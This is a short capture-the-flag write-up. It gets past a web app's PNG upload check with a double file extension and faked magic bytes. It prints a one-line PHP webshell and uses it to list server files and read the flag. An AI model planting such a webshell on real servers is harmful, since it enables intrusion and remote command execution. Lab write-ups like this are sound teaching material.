Skip to content

Trickster

If we check out /robots.txt, we find:

User-agent: *
Disallow: /instructions.txt
Disallow: /uploads/

On accessing /instructions.txt:

Let's create a web app for PNG Images processing.
It needs to:
Allow users to upload PNG images
    look for ".png" extension in the submitted files
    make sure the magic bytes match (not sure what this is exactly but wikipedia says that the first few bytes contain 'PNG' in hexadecimal: "50 4E 47" )
after validation, store the uploaded files so that the admin can retrieve them later and do the necessary processing.

We can upload a PNG file and can access it at /uploads/img.png, but access to parent folder /uploads/ is forbidden \ On trying to upload some non-PNG file, we get "Error: File name does not contain '.png'."

"contains". Hmmm... Uploading a non-PNG file named as file.png.txt worked!

Create a webshell:

PNG
<?php echo system($_GET['cmd']); ?>

/uploads/webshell.png.php?cmd=ls%20.. lists out files in the root directory, among which "GAZWIMLEGU2DQ.txt" seems interesting

Accessing /GAZWIMLEGU2DQ.txt gives the flag